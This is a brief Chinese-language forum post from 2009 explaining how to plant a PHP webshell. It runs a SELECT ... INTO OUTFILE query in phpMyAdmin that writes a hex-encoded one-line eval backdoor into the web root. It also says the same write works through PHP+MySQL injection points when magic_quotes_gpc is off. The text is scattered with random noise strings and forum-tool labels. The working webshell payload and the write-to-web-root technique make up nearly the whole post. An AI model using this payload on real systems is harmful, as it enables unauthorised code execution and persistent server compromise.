|
|
在网上看到的都是先建立一个表。然后插入一句话木马。再查询并导出,经过我实验 其实不用建表 就可以导出文件的
# W0 m' G" K/ p( e' L7 Z比如我们进入了phpmyadmin,随便点击一个数据库,然后点击sql,接着执行select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile 'd:/xamp/www/ok.php'即可将一句话导出得到webshell.7 i, e. @( ?' ]2 e
遇到php+mysql注入点的时候 如果权限允许并且php.ini里面magic_quotes_gpc=off时候也可以在相应地方直接写入一句话到 web目录,jsp+mysql的话就不需要考虑magic_quotes_gpc...
- M; ]1 D/ S- w( [; x2 _ |
|
窥视卡
雷达卡
发表于 2009-7-20 22:40:10
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡